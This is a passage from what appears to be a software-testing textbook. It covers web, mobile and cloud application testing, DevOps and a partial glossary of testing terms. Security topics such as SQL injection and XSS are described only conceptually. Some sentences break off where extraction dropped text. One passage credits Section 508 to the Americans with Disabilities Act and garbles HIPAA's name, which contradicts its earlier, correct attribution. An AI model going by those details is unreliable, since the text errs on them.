testers pose technological risks which must be addressed in test planning and test execution. It
is important to keep in mind that any technology new to the testers or the organization,
whether it is “technologically new” or not should be considered a new technology for the
purpose of risk analysis and subsequent test planning.
The following are the more common risks associated with the use of technology new to an IT
organization. Note that this list is not meant to be comprehensive but rather representative of
the types of risks frequently associated with using new technology:
• Unproven technology
The technology is available, but there is not enough experience with the use of that
technology to determine whether or not the stated benefits for using that technology
can actually be received.
• Technology incompatible with other implemented technologies
The technologies currently in place in the IT organization are usually incompatible
with the new technology acquired. Therefore, the new technology may meet all of its
stated benefits but the technology cannot be used because of incompatibility with
currently implemented technologies.
• New technology obsoletes existing implemented technologies
Many times when vendors develop new technologies, such as a new version of
software, they discontinue support of the existing software version. Thus, the
acquisition of new technology involves deleting the existing technologies and
replacing it with the new. Sometimes vendors do not declare the current technologies
obsolete until there has been general acceptance of the new technology. If testers do
not assume that older technologies will become obsolete they may fail to address the
significant new technology risk.
There are many variations within the web system architecture, but for illustration purposes the
above diagram is representative.
The notion of thin-client and thick-client processing has been around since ancient times, say
20 to 30 years ago. In the olden days thin-client typically referred to a “dumb” terminal where
a CRT and keyboard served as the user interface and all program execution happened on a
remote system (e.g., mainframe computer). More recently, the term thin-client is used to refer
to the relationship between the browser executing code with the majority of execution taking
place on a web server. When the majority of processing is executed on the server-side, a
system is considered to be a thin-client system. When the majority of processing is executed
on the client-side, a system is considered to be a thick-client system.
In a thin-client system, the user interface runs on the client host while all other components
run on the server host(s). The server is responsible for all services. After retrieving and
processing data, only a plain HTML page is sent back to the client.
By contrast, in a thick-client system, most processing is done on the client-side; the client
application handles data processing and applies logic rules to data. The server is responsible
only for providing data access features and data storage. Components such as ActiveX
controls and Java applets, which are required for the client to process data, are hosted and
executed on the client machine.
Each of these systems calls for a different testing strategy. In thick-client systems, testing
should focus on performance and compatibility. If Java applets are used, the applets will be
sent to the browser with each request, unless the same applet is used within the same instance
of the browser.
Compatibility issues in thin-client systems are less of a concern. Performance issues do,
however, need to be considered on the server-side, where requests are processed, and on the
network where data transfer takes place (for example, sending bitmaps to the browser). The
thin-client system is designed to solve incompatibility problems as well as processing-power
limitations on the client-side. Additionally, thin-client systems ensure that updates happen
immediately, because the updates are applied at that server side only.
Functional correctness – Testers should validate that the application functions correctly. This
includes validating links, calculations, displays of information and navigation. See section
10.2.2 for additional details.
Integration – Testers should validate the integration between browsers and servers,
applications and data, and hardware and software.
Usability – Testers should validate the overall usability of a web page or a web application,
including appearance, clarity, and navigation.
Accessibility – Testers should validate that people with disabilities can perceive, understand,
navigate, and interact with the web-based application under test. (Section 508 of the United
States Rehabilitation Act requires that all United States Federal Departments and Agencies
ensure that all Web site content be equally accessible to people with disabilities. This applies
to Web applications, Web pages, and all attached files. It applies to intranet as well as public-
facing Web pages.)
Security – Testers should validate the adequacy and correctness of security controls,
including access control and authorizations.
The very nature of web-based applications and the architecture involved create higher risks to
the organization deploying the application. The simple “risk” calculation is Risk = Likelihood
of failure times Cost of Failure. Web applications often impact both the multiplicand and the
multiplier in the equation.
Web applications often see a higher level of use than traditional applications. Web apps are
often customer facing and can see traffic in the thousands if not millions of hits per day. With
the higher level of use comes a higher likelihood of failure.
Whenever products or services are customer facing, the cost of failure grows exponentially.
Many companies have been defined by the failures of their web applications. The roll-out in
2013 of the US Government’s Affordable Care Act website was so catastrophic that it tainted
the entire presidential administration.
It is critical when planning for testing that detailed analysis of the application system be done
so test resources can be portioned appropriately to minimize the risks inherent in the
deployment of a web application.
For testing an existing website, test planning should include the use of:
Web Analytics – A great tool for planning web testing is the use of analytics. Web analytics
can help the testers understand the patterns of use on the application site. Analytics can
provide measures and metrics such as page views, exit rates, time on site, and visits.
Browser Usage – One of the challenges of web testing is “uncontrolled user interfaces” also
known as browsers. Web site tools allow the tester to understand what browsers and what
versions of the browsers are being used to access the web application and what types of
mobile user platforms are accessing the site. By analyzing the current patterns the tester can
set up the test environment to test on the different browsers and mobile devices identified.
Note this would now be testing the web application on a mobile device. Mobile application
testing is discussed in section 10.3.
Behavior Map – Understanding the behavior of visitors to a website helps the tester prioritize
test cases to exercise both the most frequently accessed portions of an application and also test
the most usual user movement. Heat maps are tools that essentially overlay a website and
track the user’s interaction. Heat maps track interactions such as clicks, scrolls, and mouse
movements. These tools provide a detailed picture on how the user moves around a site which
can help the testers better plan the test procedures.
During the planning phase and more specifically when planning for test automation the tester
should identify all the various page objects and response items such as:
• Entry fields, buttons, radio buttons, checkboxes, dropdown list boxes, images, links,
etc.
• Responses that may be in tables, spans, divs, lis, etc.
Browser differences can make a web application appear and/or act differently to different
people. The list given here is not intended to be exhaustive but rather is a sample.
Visual page display – Web applications do not display the same way across all browsers. Test
as many browsers as possible to ensure that the application under test (AUT) works as
intended.
Print handling – To make printing faster and easier, some pages add a link or button to print
a browser-friendly version of the page being viewed.
Reload – Some browser configurations will not automatically display updated pages if a
version of the page still exists in the cache. Some pages indicate if the user should reload the
page.
Navigation – Browsers vary in the ease of navigation, especially when it comes to visiting
pages previously visited during a session.
Graphics filters – Browsers may handle images differently, depending on the graphic files
supported by the browser. In fact, some browsers may not show an image at all.
Caching – How the cache is configured will have an impact on the performance of a browser
to display information.
Scripts – Browsers may handle scripts (e.g., Flash or Ajax page loads) differently. It is
important to understand the script compatibility across browsers and as necessary measure the
load times to help optimize performance. If scripts are only compatible with certain browsers,
test to ensure that they degrade gracefully on others so that all users get the best possible
experience.
Dynamic page generation – This includes how a user receives information from pages that
change based on input. Examples of dynamic page generation include:
• Shopping card applications
• Data search applications
• Calculated forms
File uploads and downloads – Movement of data to and from remote data storage
Email functions – Dynamic calls to email functionality will differ from browser to browser
and between native email programs.
Web applications, as with any application, need to work accurately, quickly, and consistently.
The web application tester must ensure that the product will deliver the results the user
intends. Some of the functional elements unique to web application testing are detailed in the
following sections:
10.2.4.2.1 Forms
The submission of forms is a key function on many websites. Whether the form is request for
information or a feedback survey, the testers must ensure that all field inputs are validated and
connections to back-end database systems store data correctly.
Test to ensure that audio and video playback, animations and interactive media work correctly.
These components should function as expected and not break or slow down the rest of the app
while loading or running.
10.2.4.2.3 Search
A common function in web applications is the ability to search through content, files or
documentation. Tests are needed to ensure that the search engine comprehensively indexes
this information, updates itself regularly and are quick to look up and display relevant results.
Web applications frequently have different functionality available to different access groups.
Test to ensure that each group accesses the correct functions.
Web applications are integral parts to most people’s daily activities. Whether it is checking
banking information or ordering a book online, ensuring that web apps are easy to use is
critical. The web application should provide a quality front-end experience to all users. Some
of the conditions for consideration in usability testing include those listed in the following
sections.
10.2.4.3.1 Navigation
All links to and from the homepage should be prominent and point to the right destination
pages. A standard approach for testing forward and backward and other links should be
defined and used.
10.2.4.3.2 Accessibility
As discussed in section 10.2.2, testers must ensure that the application under test is easy to use
even for those with disabilities or impairments of vision or motor functions.
Like any application, the web app will invariably respond incorrectly at some point. As with
any error routines, the AUT should trap the error, display a descriptive and helpful message to
the user, and then return control to the user in such a fashion that the application continues to
operate and preserves the user’s data.
Central to usability is the ability of user to use the system. Not all users will be equally
comfortable using a web application and may need assistance the first few times. Even
experienced users will question what to do at times and require assistance on specific items.
Testers should test the documentation and/or support channels to ensure they are easily found
and accessible from any module or page.
Standards for web design have had mixed success. Regardless of the lack of a recognized
standard there certainly are some de facto standards which should be followed. This allows
the web user the ability to move from website to website without re-learning the page layout
styles. An easy example is the underlining or color change of a word(s) indicating a hyperlink
to another page. Other de facto standards include: site log in, site log out, contact us, and help
links/buttons being located in the top right corner of a web pages. Such standards help to
alleviate the “hunting” necessary to find a commonly used option on various websites.
10.2.4.3.6 Layouts
Consistency across the web application for such items as central workspace, menu location
and functionality, animations, interactions (such as drag-and-drop features and modal
windows), fonts and colors is important.
Many web applications take input from users and store that data on a remote system (e.g.,
database server). It is critically important to validate that the application and data are protected
from outside intrusion or unauthorized access. Testers must validate that these vulnerabilities
do not exist in the AUT. Some of the common security issues are described here.
A common attack pattern is for a hacker, through a user input vulnerability, to execute a SQL
command on the app’s database, leading to damage or theft of user data. These generally
occur due to the improper neutralization of special elements used in SQL commands or OS
commands.
XSS is a type of computer security vulnerability which enables attackers to inject client-side
script into web pages viewed by other users. This allows an attacker to send malicious content
from an end-user and collect some type of data from a victim.
SSL Certificates are small data files that digitally bind a cryptographic key to an
organization’s details. When installed on a web server, it activates a padlock and the https
protocol allowing secure connections from a web server to a browser. Testers must ensure that
HTTPS is used where required for secure transaction control.
Simply stated, mobile apps are the computer programs designed to run on those 7 billion
smartphones, tablet computers and other mobile devices. Many mobile apps are pre-installed
by the mobile device manufacturer while over a million apps are delivered through
application distribution platforms such as the Apple App Store (1.3 million apps as of June
2014), Google Play Store (1.3 million apps as of September 2014), Windows Phone Store
(300,000 apps as of August 2014), BlackBerry App World (236,601 apps as of October 2013)
and Amazon App Store (250,908 apps as of July 2014). Mobile apps are also written and
distributed within the closed environments of organizations.
Mobile applications can be classified into various domain areas which include: information,
social media, games, retail, banking, travel, e-readers, telephony, and professional (e.g.,
financial, medical, and engineering) to name a few. The risks associated with the different
domains vary and the resources expended on testing should correlate directly.
The characteristics of the mobile application environment create unique challenges for
application development and subsequent conditions that will require testing. Some of the
challenges presented by the mobile platform are:
• Compatibility:
CPU
Memory
Display size / resolution
Keyboard (soft / hard / external)
Touch functionality
• Multiple operating systems:
iOS versions
Android versions
Windows Mobile
Windows Phone
BlackBerry
• Data entry:
Typing on a smartphone keyboard, hard or soft,
takes 2-5 times longer than on a computer keyboard
External keyboards (Bluetooth)
Voice
• Unique functionality:
Location awareness (GPS + DB(s))
10.3.2.1 Functionality
Testers must validate that the Mobile App can perform the functionality for which it was
designed. Functionality testing should consider:
Happy, Sad and Alternate Paths – The tester must validate that the happy path, sad path and
the alternate paths through the application execute and return the expected result.
Installation Processes – Unlike most other types of applications, mobile apps are likely to be
installed by an end user on their own device. The tester must ensure that the installation
process works correctly and is easy to understand for the target audience.
Special Functionality – The mobile application, more so than most other application delivery
models, sports some interesting special functions. Functions such as:
• Orientation – Tester must validate, based on the design requirements, that the
application changes orientation with the movement of the mobile device and that the
display format presents the information is a fashion consistent with the design
specification.
• Location – If an application requirement is location awareness, the tester must
validate that the mobile device’s GPS or tower triangulation provides accurate location
coordinates and that those coordinates are utilized by the application as required.
• Gestures – Testing, as applicable, that gestures such as “push to refresh” techniques
have been implemented correctly.
• Internationalization – Ensure that language, weights, and measures work correctly
for the location of the device.
• Barcode scanning – For mobile devices and applications that support barcodes or QR
codes, testers must validate correct operation.
• Hardware Add-ons – Tester must validate that any potential hardware add-ons (like a
credit card reader) function correctly with the application under test.
Regulatory Compliance – The tester must be aware of and validate any regulatory
compliance issues. Examples include section 508 of the Americans with Disabilities Act,
Health Information Portability and Accountability Act (HIPPA) regulations, and data use
Privacy Laws.
10.3.2.2 Performance
Testers must validate that the Mobile App’s performance is consistent with stated design
specifications. The tester should integrate performance testing with functional testing to
measure the impact of load on the user experience. Tests should include:
• Load and stress tests when:
Many applications are open
System is on for long periods of time
Application experiences 2-3 times the expected capacity
When data storage spaced is exceeded
• Validate application opening time when:
Application is not in memory
Application has been pre-loaded
• Performance behavior when:
Low battery
Bad network coverage
Low available memory
Simultaneous access to multiple application servers
10.3.2.3 Usability
Providing a good user experience for ALL users is critical. The testers must ensure that the
application is clear, intuitive and easy to navigate. Considerations when testing the usability of
a mobile application are:
• Validate that the system status is visible.
• Test the consistency between what a user’s real-world experience would be and how
the application functions. An example might be how the natural and logical order of
things is handled.
• Test to validate that user control and freedom such as an emergency exit, undo, redo,
or rollback function has been implemented.
• Test to ensure consistency and standards that are followed as dictated by the specific
platform.
• Test to validate that error prevention has been done by eliminating error-prone
conditions and presenting users with a confirmation option.
• Test to validate that the application was designed in such a fashion that objects and
options are visible as necessary reducing the need for users to remember specific
functionality.
• Real estate is valuable on the mobile device screen. The tester should ensure that good
aesthetics and a minimalist design has been done. Examples might be ensuring that the
screen is clear of information which is irrelevant or rarely needed.
• As with all applications, mobile or otherwise, the way the application handles error
conditions is critically important to the user’s experience. The tester should validate
that the application traps errors, helps the user recognize the error condition by
providing easily understood verbiage, and then helps diagnose the problem and
recover from error condition.
• Finally, the tester should ensure that help and documentation is available for the user
as necessary.
Mobile applications will likely experience interruptions during execution. An application will
face interruptions such as incoming calls, text messages, or network coverage outage. The
tester should create tests to validate the application functions under these various types of
interruptions:
• Incoming and Outgoing SMS and MMS
• Incoming and Outgoing calls
• Incoming Notifications
• Cable Insertion and Removal for data transfer
• Network outage and recovery
• Media Player on/off
• Device Power cycle
10.3.2.5 Security
Mobile devices, by definition, are “mobile”. The mobility of the device and by extension the
applications and data greatly increases risk. Testers must check how the device is accessed
and the functions where system or data can be compromised. Areas of concern that must be
tested include:
• Unauthorized access
• Data leakage
• Re-authentication for sensitive activities
• “Remember me” functionality
• Authentication of back-end security protocols
• Searching device’s file system (if possible)
10.3.2.6 Interoperability
Mobile devices frequently connect to other devices to upload, download or share information.
The testers must validate that the system securely connects to and interfaces with other
systems appropriately. Areas that should be tested include:
• Data Exchange
Exchanging data with the app server, or DB server
Data upload after the device is off-line
• Invoking functionality
Notifications: tray, pop-up, update
Real-time messaging
Video streaming
• Application updates
The testers must validate that system protects the system and data when failures occur. Test
conditions must be identified that validate system reaction and response to:
• Battery low or failure
• Poor reception and loss of reception
• GPS loss
• Data transfer interruption
There are some specific tools dedicated to automating tests for mobile platforms. Some of the
different approaches include:
Remote control – A variety of mobile test tools provide easy and secure remote control
access to the devices under test using a browser.
Add-ons – Many software automation tools provide mobile testing add-ons to the existing
tools suite.
Testing Cloud-based Applications – Testing applications that are deployed in the cloud for
such cloud specific nuances as cloud performance, security of cloud applications, and
availability and continuity within the cloud.
The Cloud as a Testing Platform – Using the cloud environment to generate massive
distributed load tests, simulate a large number of mobile devices, or run functional and
performance monitors from all over the world.
Within the cloud computing definition are three service models available to cloud customers:
There are four deployment models that describe how the computing infrastructure that
delivers the services can be shared. The four models and basic characteristics are:
• Private Cloud
Operated solely for an organization
Managed by the organization or third party
Exists on-premises or off-premises
• Community Cloud
Shared by specific community of several organizations
Managed by the organizations or third party
Exists on-premises or off-premises
• Public Cloud
Available to general public
Managed by the organization or third party
Exists off-premises
• Hybrid Cloud
Composition of two or more clouds; remain unique entities
Bound together by standardized or proprietary technology
Exists on-premises or off-premises
Cloud based applications by their very definition often run on hardware over which the
application owner has little or no control. Further to that concern, cloud apps may well be
sharing the hardware and operating environments with other applications. This characteristic
of cloud based apps intensifies the need for performance and scalability testing.
Cloud based applications usually share resources and infrastructure with others. The tester
must give extra consideration to ensuring that data privacy and access control issues are
working correctly.
The cloud based application tester develops tests which both reactively and proactively test
that IT services can recover and continue even after an incident occurs.
Cloud applications are likely to consume external APIs and services for providing some of
their functionality.
10.6 DevOps
“The emerging professional movement that advocates a collaborative working relationship
between Development and IT Operations, resulting in the fast flow of planned work (i.e.,
high deploy rates), while simultaneously increasing the reliability, stability, resilience of the
production environment.”
development lifecycle approaches are not intended to deliver nor can they deliver at this pace.
Enter, DevOps.
The DevOps model creates a seamless integrated system moving from the development team
writing the code, automatically deploying the executable code into the automated test
environment, having the test team execute the automated tests, and then deployment into the
production environment. This process moves in one smooth integrated flow. Automation
plays a pivotal role in the DevOps process. The use of Continuous Integration tools and test
automation are the standard in the DevOps model.
• Store artifacts and build repository (configuration management for storing artifacts,
results, and releases)
• Use of release automation tool to deploy apps into production environment
• Configure environment
• Update databases
• Update apps
• Push to users
Within DevOps, every action in the chain is automated. This approach allows the application
development team to focus on designing, coding, and testing a high quality deliverable.
Similar to the impact of Agile on the role of all individuals in the development cycle, DevOps
encourages everyone to contribute across the chain. Ultimately, the quality and timeliness of
the application system is the responsibility of everyone within the chain.
Typically, IoT is expected to offer advanced connectivity of devices, systems, and services
that goes beyond machine-to-machine communications (M2M) and covers a variety of
protocols, domains, and applications.
1. Holler, J., and etc. From Machine-to-Machine to the Internet of Things: Introduction to a New Age
of Intelligence. 2014
A
Vocabulary
Acceptance A key prerequisite for test planning is a clear understanding of what
Criteria must be accomplished for the test project to be deemed
successful.
Those things a user will be able to do with the product after a story
is implemented. (Agile)
Act If your checkup reveals that the work is not being performed
according to plan or that results are not as anticipated, devise
measures for appropriate action. (Plan-Do-Check-Act)
Access Modeling Used to verify that data requirements (represented in the form of
an entity-relationship diagram) support the data demands of
process requirements (represented in data flow diagrams and
process specifications.)
Active Risk Risk that is deliberately taken on. For example, the choice to
develop a new product that may not be successful in the
marketplace.
Alternate Path Additional testable conditions are derived from the exceptions and
alternative course of the Use Case.
Affinity Diagram A group process that takes large amounts of language data, such
as a list developed by brainstorming, and divides it into categories.
Analogous A common method for estimating test effort is to calculate the test
Percentage estimate as a percentage of previous test efforts using a predicted
Method size factor (SF) (e.g., SLOC or FPA).
Application A single software product that may or may not fully support a
business function.
Black-Box Testing A test technique that focuses on testing the functionality of the
program, component, or application against its specifications
without knowledge of how the system is constructed; usually data
or business process driven.
Bottom-Up Begin testing from the bottom of the hierarchy and work up to the
top. Modules are added in ascending hierarchical order. Bottom-up
testing requires the development of driver modules, which provide
the test input, that call the module or program being tested, and
display test output.
Bottom-Up In this technique, the cost of each single activity is determined with
Estimation the greatest level of detail at the bottom level and then rolls up to
calculate the total project cost.
Boundary Value A data selection technique in which test data is chosen from the
Analysis “boundaries” of the input or output domain classes, data structures,
and procedure parameters. Choices often include the actual
minimum and maximum boundary values, the maximum value plus
or minus one, and the minimum value plus or minus one.
Branch/Decision A test method that requires that each possible branch on each
Testing decision point be executed at least once.
Cause and Effect A cause and effect diagram visualizes results of brainstorming and
Diagrams affinity grouping through major causes of a significant process
problem.
Client The customer that pays for the product received and receives the
benefit from the use of the product.
Common Causes Common causes of variation are typically due to a large number of
of Variation small random sources of variation. The sum of these sources of
variation determines the magnitude of the process’s inherent
variation due to common causes; the process’s control limits and
current process capability can then be determined.
Complete Test Set A test set containing data that causes each element of pre-
specified set of Boolean conditions to be true. In addition, each
element of the test set causes at least one condition to be true.
Completeness The property that all necessary parts of an entity are included.
Often, a product is said to be complete if it has met all
requirements.
Condition Testing A structural test technique where each clause in every condition is
forced to take on each of its possible values in combination with
those of other clauses.
Configuration Tools that are used to keep track of changes made to systems and
Management Tools all related artifacts. These are also known as version control tools.
Consistent A set of Boolean conditions such that complete test sets for the
Condition Set conditions uncover the same errors.
Constraints A limitation or restriction. Constraints are those items that will likely
force a dose of “reality” on a test project. The obvious constraints
are test staff size, test schedule, and budget.
Control Control is anything that tends to cause the reduction of risk. Control
can accomplish this by reducing harmful effects or by reducing the
frequency of occurrence.
Control Charts A statistical technique to assess, monitor and maintain the stability
of a process. The objective is to monitor a continuous repeatable
process and the process variation from specifications. The intent of
Correctness The extent to which software is free from design and coding
defects (i.e., fault-free). It is also the extent to which software
meets its specified requirements and user objectives.
Cost of Quality Money spent beyond expected production costs (labor, materials,
(COQ) equipment) to ensure that the product the customer receives is a
quality (defect free) product. The Cost of Quality includes
prevention, appraisal, and failure costs.
COTS Commercial Off the Shelf (COTS) software products that are
ready-made and available for sale in the marketplace.
Coverage-Based A metric used to show the logic covered during a test session,
Analysis providing insight to the extent of testing. The simplest metric for
coverage would be the number of computer statements executed
during the test compared to the total number of statements in the
program. To completely test the program structure, the test data
chosen should cause the execution of all paths. Since this is not
generally possible outside of unit test, general metrics have been
developed which give a measure of the quality of test data based
on the proximity to this ideal coverage. The metrics should take
into consideration the existence of infeasible paths, which are
those paths in the program that have been designed so that no
data will cause the execution of those paths.
Critical Listening The listener is performing an analysis of what the speaker said.
This is most important when it is felt that the speaker is not in
complete control of the situation, or does not know the complete
facts of a situation.
Critical Success Critical Success Factors (CSFs) are those criteria or factors that
Factors must be present in a software application for it to be successful.
Data Dictionary Provides the capability to create test data to test validation for the
defined data elements. The test data generated is based upon the
attributes defined for each data element. The test data will check
both the normal variables for each data element as well as
abnormal or error conditions for each data element.
Data Flow In data flow analysis, we are interested in tracing the behavior of
Analysis program variables as they are initialized and modified while the
program executes.
Debugging The process of analyzing and correcting syntactic, logic, and other
errors identified during testing.
Decision Analysis This technique is used to structure decisions and to represent real-
world problems by models that can be analyzed to gain insight and
understanding. The elements of a decision model are the
decisions, uncertain events, and values of outcomes.
Decision Coverage A white-box testing technique that measures the number of, or
percentage of, decision directions executed by the test case
designed. 100% decision coverage would indicate that all decision
directions had been executed at least once during testing.
Alternatively, each logical path through the program can be tested.
Often, paths through the program are grouped into a finite set of
classes, and one path from each class is tested.
Decision Table A tool for documenting the unique combinations of conditions and
associated results in order to derive unique test cases for
validation testing.
Defect Tracking Tools for documenting defects as they are found during testing and
Tools for tracking their status through to resolution.
Design Level The design decomposition of the software item (e.g., system,
subsystem, program, or module).
Desk Checking The most traditional means for analyzing a system or a program.
Desk checking is conducted by the developer of a system or
program. The process involves reviewing the complete product to
ensure that it is structurally sound and that the standards and
requirements have been met. This tool can also be used on
artifacts created during analysis and design.
Driver Code that sets up an environment and calls a module for test.
Dynamic A dynamic analysis technique that inserts into the program code
Assertion assertions about the relationship between program variables. The
truth of the assertions is determined as the program executes.
Ease of Use and These are functions of how easy it is to capture and use the
Simplicity measurement data.
Empowerment Giving people the knowledge, skills, and authority to act within their
area of expertise to do the work and improve the process.
Entrance Criteria Required conditions and standards for work product quality that
must be present or met for entry into the next stage of the software
development process.
Error Guessing Test data selection technique for picking values that seem likely to
cause defects. This technique is based upon the theory that test
cases and test data can be developed based on the intuition and
experience of the tester.
Exit Criteria Standards for work product quality, which block the promotion of
incomplete or defective work products to subsequent stages of the
software development process.
Exploratory The term “Exploratory Testing” was coined in 1983 by Dr. Cem
Testing Kaner. Dr. Kaner defines exploratory testing as “a style of software
testing that emphasizes the personal freedom and responsibility of
the individual tester to continually optimize the quality of his/her
work by treating test-related learning, test design, test execution,
and test result interpretation as mutually supportive activities that
run in parallel throughout the project.”
Failure Costs All costs associated with defective products that have been
delivered to the user and/or moved into production. Failure costs
can be classified as either “internal” failure costs or “external”
failure costs.
Force Field A group technique used to identify both driving and restraining
Analysis forces that influence a current situation.
Functional System Functional system testing ensures that the system requirements
Testing and specifications are achieved. The process involves creating test
conditions for use in evaluating the correctness of the application.
Functional Testing Application of test data derived from the specified functional
requirements without regard to the final program structure.
Gap Analysis This technique determines the difference between two variables. A
gap analysis may show the difference between perceptions of
importance and performance of risk management practices. The
gap analysis may show discrepancies between what is and what
needs to be done. Gap analysis shows how large the gap is and
how far the leap is to cross it. It identifies the resources available to
Happy Path Generally used within the discussion of Use Cases, the happy path
follows a single flow uninterrupted by errors or exceptions from
beginning to end.
Inherent Risk Inherent Risk is the risk to an organization in the absence of any
actions management might take to alter either the risk’s likelihood
or impact.
Integration Testing This test begins after two or more programs or application
components have been successfully unit tested. It is conducted by
the development team to validate the technical quality or design of
the application. It is the first level of testing which formally
integrates a set of programs that communicate among themselves
via messages or files (a client and its server(s), a string of batch
programs, or a set of online modules within a dialogue or
conversation.)
Invalid Input Test data that lays outside the domain of the function the program
represents.
ISO 29119 ISO 29119 is a set of standards for software testing that can be
used within any software development life cycle or organization.
Iterative Model The project is divided into small parts allowing the development
team to demonstrate results earlier on in the process and obtain
valuable feedback from system users.
Life Cycle Testing The process of verifying the consistency, completeness, and
correctness of software at each stage of the development life cycle.
Mean A value derived by adding several quantities and dividing the sum
by the number of these quantities..
Metric-Based Test The process of generating test sets for structural testing based on
Data Generation use of complexity or coverage metrics.
Model Animation Model animation verifies that early models can handle the various
types of events found in production data. This is verified by
“running” actual production transactions through the models as if
they were operational systems.
Optimum Point of The point where the value received from testing no longer exceeds
Testing the cost of testing.
Pareto Analysis The Pareto Principle states that only a “vital few” factors are
responsible for producing most of the problems. This principle can
be applied to risk analysis to the extent that a great majority of
problems (80%) are produced by a few causes (20%). If we correct
these few key causes, we will have a greater probability of
success.
Pareto Charts A special type of bar chart to view the causes of a problem in order
of severity: largest to smallest based on the 80/20 premise.
Passive Risk Passive Risk is that which is inherent in inaction. For example, the
choice not to update an existing product to compete with others in
the marketplace.
Path Expressions A sequence of edges from the program graph that represents a
path through the program.
Path Testing A test method satisfying the coverage criteria that each logical path
through the program be tested. Often, paths through the program
are grouped into a finite set of classes and one path from each
class is tested.
Performance Test Validates that both the online response time and batch run times
meet the defined performance requirements.
Phase (or Stage) A method of control put in place within each stage of the
Containment development process to promote error identification and resolution
so that defects are not propagated downstream to subsequent
stages of the development process.
Plan Define your objective and determine the conditions and methods
required to achieve your objective. Clearly describe the goals and
policies needed to achieve the objective at this stage. (Plan-Do-
Check-Act)
Plan-Do-Check- One of the best known process improvement models is the Plan-
Act model Do-Check-Act model for continuous process improvement.
Post Conditions A list of conditions, if any, which will be true after the Use Case
finished successfully.
Pre-Conditions A list of conditions, if any, which must be met before the Use Case
can be properly executed.
Prevention Costs Resources required to prevent defects and to do the job right the
first time. These normally require up-front expenditures for benefits
that will be derived later. This category includes money spent on
establishing methods and procedures, training workers, acquiring
tools, and planning for quality. Prevention resources are spent
before the product is actually built.
Procedure Describe how work must be done and how methods, tools,
techniques, and people are applied to perform a process. There
are Do procedures and Check procedures. Procedures indicate the
“best way” to meet standards.
Process Risk Process risk is the activities such as planning, resourcing, tracking,
quality assurance, and configuration management.
Product The output of a process: the work product. There are three useful
classes of products: Manufactured Products (standard and
custom), Administrative/Information Products (invoices, letters,
etc.), and Service Products (physical, intellectual, physiological,
and psychological). A statement of requirements defines products;
one or more people working in a process produce them.
Productivity The ratio of the output of a process to the input, usually measured
in the same units. It is frequently useful to compare the value
added to a product by a process, to the value of the input
resources required (using fair market values for both input and
output).
Quality Control The process by which product quality is compared with applicable
(QC) standards, and the action taken when nonconformance is detected.
Its focus is defect detection and removal. This is a line function;
that is, the performance of these tasks is the responsibility of the
people working within the process.
Reader Must understand the material, paraphrases the material during the
(Inspections) inspection, and sets the inspection pace.
Recovery Test Evaluates the contingency features built into the application for
handling interruptions and for returning to specific points in the
application processing cycle, including checkpoints, backups,
restores, and restarts. This test also assures that disaster recovery
is possible.
Residual Risk Residual Risk is the risk that remains after management responds
to the identified risks.
Reuse Model The premise behind the Reuse Model is that systems should be
built using existing components, as opposed to custom-building
new components. The Reuse Model is clearly suited to Object-
Risk Acceptance Risk Acceptance is the amount of risk exposure that is acceptable
to the project and the company and can be either active or passive.
Risk Appetite Risk Appetite defines the amount of loss management is willing to
accept for a given risk.
Risk Avoidance Risk avoidance is a strategy for risk resolution to eliminate the risk
altogether. Avoidance is a strategy to use when a lose-lose
situation is likely.
Risk Event Risk Event is a future occurrence that may affect the project for
better or worse. The positive aspect is that these events will help
you identify opportunities for improvement while the negative
aspect will be the realization of threats and losses.
Risk Exposure Risk Exposure is the measure that determines the probability of
likelihood of the event times the loss that could occur.
Risk Identification Risk Identification is a method used to find risks before they
become problems. The risk identification process transforms
issues and concerns about a project into tangible risks, which can
be described and measured.
Risk Mitigation Risk Mitigation is the action taken to reduce threats and/or
vulnerabilities.
Risk Reserves A risk reserve is a strategy to use contingency funds and built-in
schedule slack when uncertainty exists in cost or time.
Risk Transfer Risk transfer is a strategy to shift the risk to another person, group,
or organization and is used when another group has control.
Sad Path A path through the application which does not arrive at the desired
result.
Scope of Testing The scope of testing is the extensiveness of the test process. A
narrow scope may be limited to determining whether or not the
software specifications were correctly implemented. The scope
broadens as more responsibilities are assigned to software testers.
Selective The process of testing only those sections of a program where the
Regression tester’s analysis indicates programming changes have taken place
Testing and the related components.
Soft Skills Soft skills are defined as the personal attributes which enable an
individual to interact effectively and harmoniously with other
people.
Software Item Source code, object code, job control code, control data, or a
collection of these.
Software Quality Software quality factors are attributes of the software that, if they
Factors are wanted and not present, pose a risk to the success of the
software and thus constitute a business risk.
Software Quality The first gap is the producer gap. It is the gap between what was
Gaps specified to be delivered, meaning the documented requirements
and internal IT standards, and what was actually delivered. The
second gap is between what the producer actually delivered
compared to what the customer expected.
Special Causes of Variation not typically present in the process. They occur because
Variation of special or unique circumstances.
Special Test Data Test data based on input values that are likely to require special
handling by the program.
Spiral Model Model designed to include the best features from the Waterfall and
Prototyping, and introduces a new component risk-assessment.
Standardizer Must know IT standards & procedures, ensures standards are met
and procedures are followed, meets with project leader/manager,
and ensures entrance criteria are met (product is ready for review).
Statement of The exhaustive list of requirements that define a product. Note that
Requirements the statement of requirements should document requirements
proposed and rejected (including the reason for the rejection)
during the requirement determination process.
Statement Testing A test method that executes each statement in a program at least
once during program testing.
Statistical Process The use of statistical techniques and tools to measure an ongoing
Control process for change or stability.
Structural System Structural System Testing is designed to verify that the developed
Testing system and programs work. The objective is to ensure that the
product designed is structurally sound and will function correctly.
Structural Testing A testing method in which the test data is derived solely from the
program structure.
System Boundary A system boundary diagram depicts the interfaces between the
Diagram software under test and the individuals, systems, and other
interfaces. These interfaces or external agents are referred to as
“actors.” The purpose of the system boundary diagram is to
establish the scope of the system and to identify the actors (i.e.,
the interfaces) that need to be developed. (Use Cases)
System Test The entire system is tested to verify that all functional, information,
structural and quality requirements have been met. A
predetermined combination of tests is designed that, when
executed successfully, satisfy management that the system meets
specifications. System testing verifies the functional quality of the
system in addition to all external interfaces, manual procedures,
restart and recovery, and human-computer interfaces. It also
verifies that interfaces between the application and the open
environment work correctly, that JCL functions correctly, and that
the application functions appropriately with the Database
Test Case A software tool that creates test cases from requirements
Generator specifications. Cases generated this way ensure that 100% of the
functionality specified is tested.
Test Case An individual test condition, executed as part of a larger test that
Specification contributes to the test’s objectives. Test cases document the input,
expected results, and execution conditions of a given test item.
Test cases are broken down into one or more detailed test scripts
and test data conditions for execution.
Test Cycle Test cases are grouped into manageable (and schedulable) units
called test cycles. Grouping is according to the relation of
objectives to one another, timing requirements, and on the best
way to expedite defect detection during the testing event. Often
test cycles are linked with execution of a batch process.
Test Data Data points required to test most applications; one set of test data
to confirm the expected results (data along the happy path), a
second set to verify the software behaves correctly for invalid input
